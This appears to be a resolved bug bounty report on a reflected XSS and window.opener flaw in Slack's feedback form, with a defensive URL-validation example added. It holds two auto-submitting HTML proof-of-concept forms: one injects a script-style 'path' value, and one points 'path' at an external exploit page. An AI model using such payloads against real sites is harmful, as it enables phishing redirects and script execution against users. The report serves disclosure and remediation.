XSS on link and window.opener
Medium
Slack
Reported by
pisarenko
Vulnerability Details
Technical details and impact analysis
Hi, possible XSS and error when clicking on the link.
```html
<form name="pisarenko" action="https://api.slack.com/feedback/submit" method="POST">
<input type='hidden' name='crumb' value="1">
<input type='hidden' name='path' value="blocked:alert()">
<input type='hidden' name='vote' value="Yes">
</form>
<script>document.pisarenko.submit();</script>
```
or
```html
<form name="pisarenko" action="https://api.slack.com/feedback/submit" method="POST">
<input type='hidden' name='crumb' value="1">
<input type='hidden' name='path' value="https://servisvk.com/exploit/opener.php">
<input type='hidden' name='vote' value="Yes">
</form>
<script>document.pisarenko.submit();</script>
```
## Impact
Redirection from the original site to an evil site, or execution of JS code.
Please check that the domain is `slack`
{F765317}
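One way to apply the check the report asks for (that the domain is `slack`) before the submitted `path` value is rendered as a link, shown as an added example that is not part of the original report and not Slack's actual fix. The names `safeReturnPath`, `renderBackLink` and `ALLOWED_HOSTS`, the contents of the allowlist, and the assumption that `path` ends up in a link's `href` are illustrative.

```javascript
// Added example (not Slack's code). Hosts in the allowlist are assumptions.
const BASE = "https://api.slack.com"; // host taken from the form action in the report
const ALLOWED_HOSTS = new Set(["api.slack.com", "slack.com"]); // assumed allowlist

// Return a normalised https URL on an allowed host, or null if `raw` is unsafe.
function safeReturnPath(raw) {
  if (typeof raw !== "string" || raw.length === 0 || raw.length > 2048) return null;
  // Browsers strip tabs/newlines and treat "\" as "/" in URLs, so reject them outright.
  if (/[\u0000-\u0020\u007f\\]/.test(raw)) return null;
  let url;
  try {
    url = new URL(raw, BASE); // relative paths resolve against BASE
  } catch {
    return null;
  }
  if (url.protocol !== "https:") return null; // drops script-like, data: and http: schemes
  if (url.username || url.password) return null; // no "https://slack.com@other.host/"
  if (!ALLOWED_HOSTS.has(url.hostname)) return null; // exact match, not substring or suffix
  return url.href;
}

function escapeAttr(s) {
  return s.replace(/[&<>"']/g, (c) =>
    ({ "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
}

// Build the link; unsafe values fall back to the site root instead of being reflected.
function renderBackLink(raw) {
  const href = safeReturnPath(raw) ?? BASE + "/";
  // rel=noopener stops the opened page from reaching window.opener.
  return `<a href="${escapeAttr(href)}" target="_blank" rel="noopener noreferrer">Back</a>`;
}

// Constructed inputs: the two `path` values from the report plus lookalike hosts.
const samples = [
  "blocked:alert()",
  "https://servisvk.com/exploit/opener.php",
  "//servisvk.com/exploit/opener.php",
  "https://api.slack.com.servisvk.com/",
  "/docs/feedback?x=1",
];
for (const s of samples) console.log(JSON.stringify(s), "->", safeReturnPath(s));
```
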
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Bounty
$1000.00
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected